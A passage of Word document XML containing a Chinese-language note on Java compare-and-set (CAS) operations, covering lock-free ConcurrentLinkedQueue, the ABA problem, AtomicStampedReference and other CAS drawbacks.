          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (compareAndSet(current, next))  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>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00FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>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rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5FAE2"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.util.concurrent.ConcurrentLinkedQueue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类全是采用的非阻塞算法，里面没有使用任何锁，全是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作实现的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作可以说是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并发框架的基础，整个框架的设计都是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="t2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ABA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作容易导致</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ABA</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是在做</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之间，</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可能被多个线程修改过了，只不过回到了最初的值，这时</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会认为</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值没有变。</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="001964A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在外面逛了一圈回来，你能保证它没有做任何坏事，不能！！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也许它讨闲，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值减了一下，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值加了一下等等，更有甚者如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是一个对象，这个对象有可能是新创建出来的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是一个引用呢情况又如何，所以这里面还是存在着很多问题的，解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ABA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>问题的方法有很多，可以考虑增加一个修改计数，只有修改计数不变的且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值不变的情况下才做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也可以考虑引入版本号，当版本号相同时才做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作等，这和事务原子性处理有点类似！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005534AE" w:rsidRDefault="005534AE" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">AtomicStampedReference </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类就是干这个的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002269EF" w:rsidRDefault="002269EF" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="002269EF">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="444444"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/549294286/p/3766717.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、比较花费</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资源，即使没有任何争用也会做一些无用功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、会增加程序测试的复杂度，稍不注意就会出现问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683C73" w:rsidRPr="00683C73" w:rsidRDefault="00683C73" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、只能保证一个共享变量的原子操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="00261FD1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00261FD1" w:rsidRDefault="00261FD1" w:rsidP="009531FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="t3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在无锁的情况下实现原子操作，但要明确应用场合，非常简单的操作且又不想引入锁可以考虑使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，当想要非阻塞地完成某一操作也可以考虑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。不推荐在复杂操作中引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
